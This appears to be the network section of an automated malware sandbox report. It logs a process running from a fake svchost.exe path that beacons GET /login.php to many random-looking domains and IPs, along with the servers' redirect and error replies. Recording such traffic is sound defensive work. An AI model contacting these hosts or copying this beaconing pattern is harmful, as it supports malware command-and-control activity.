                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            13192.168.2.95688885.17.31.82807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:39.922681093 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            14192.168.2.95690513.248.169.48807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.060307980 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupydeq.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.480381012 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:42 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            15192.168.2.956911188.114.96.3807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.547264099 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.319098949 CET793INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:43 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SbYcdf7wY3E%2BPV3FOKhHCFJkO%2FHMmDxIhBUyzpCJEel6etCQReCfSouT3vS7XyWIn9ENt0ysOINEFiWJAit1GWhH797qtTlsvEFrn7gq7zAeiqmQuf89LZxxby3ASA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe151585c425c-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1177&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.319134951 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.421735048 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:45.827609062 CET982INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBGex7bArF0%2B9us3xBGi4T6ScgXHzBNGteLBTqsvvdfjRJb2zQHzzBjC%2FUf6a%2BvXFJgiXZvJ%2BHzzQprRSr9%2F9pB6uCZ8R2OPvXeqILTiiVZlOkL%2B2xDGUezUYaDtbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1613d90425c-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1177&sent=5&recv=7&lost=0&retrans=0&sent_bytes=966&recv_bytes=486&delivery_rate=3271084&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.734041929 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.190869093 CET976INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:05 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2fNvrjUU%2Bsp3ZXgf1nwQHIZ9F4eNXGXblHbPrtWgrQdDv6lCyT78S8qI1X7ahOkVLK0VFj%2BdbTqufP0eQvMPQ7AVEIQUMIRkZTvYeyvPzq7IFZNmRKgjbaSHwr5jA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1da1b91425c-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1948&recv_bytes=729&delivery_rate=3271084&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.054352045 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:07.387156010 CET973INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:07 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://lysyvan.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EN0QkG7BTTqmpZRz6d2sdBpUhFKaJWytuZkrMtV9EZkIIppTY3O3d9trgm1vi4Fidrqt%2F5TcIpLPSgh1FG6HzazrjLaxG4uLT1aRCANBKsnXak0m3i58IujsHkmVWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1e86e6e425c-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1178&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2924&recv_bytes=972&delivery_rate=3271084&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            16192.168.2.9569123.94.10.34807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.663829088 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lygynud.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.092955112 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:43 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=afe1d12b60746e0899399294d35ad7c2|66.23.206.109|1731344863|1731344863|0|1|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            17192.168.2.95691318.208.156.248807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.673729897 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: pupycag.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.096957922 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:43 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=3079995e65d71de93ec0f852c88d2c35|66.23.206.109|1731344863|1731344863|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            18192.168.2.956915103.150.10.48807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:42.723053932 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.506666899 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:43 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.298877001 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.573286057 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:44 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                            Nov 11, 2024 18:08:04.760523081 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.043391943 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:04 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.470715046 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyrysor.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:05.776349068 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty/1.15.8.1
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:05 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 151
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: http://106.15.232.163:8000/dh/147287063_134827.html#index8?d=lyrysor.com
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            19192.168.2.956923106.15.232.16380007444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:43.518893003 CET290OUTGET /dh/147287063_134827.html HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: 106.15.232.163:8000
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Nov 11, 2024 18:07:44.297677040 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: openresty/1.21.4.3
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:44 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 561
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
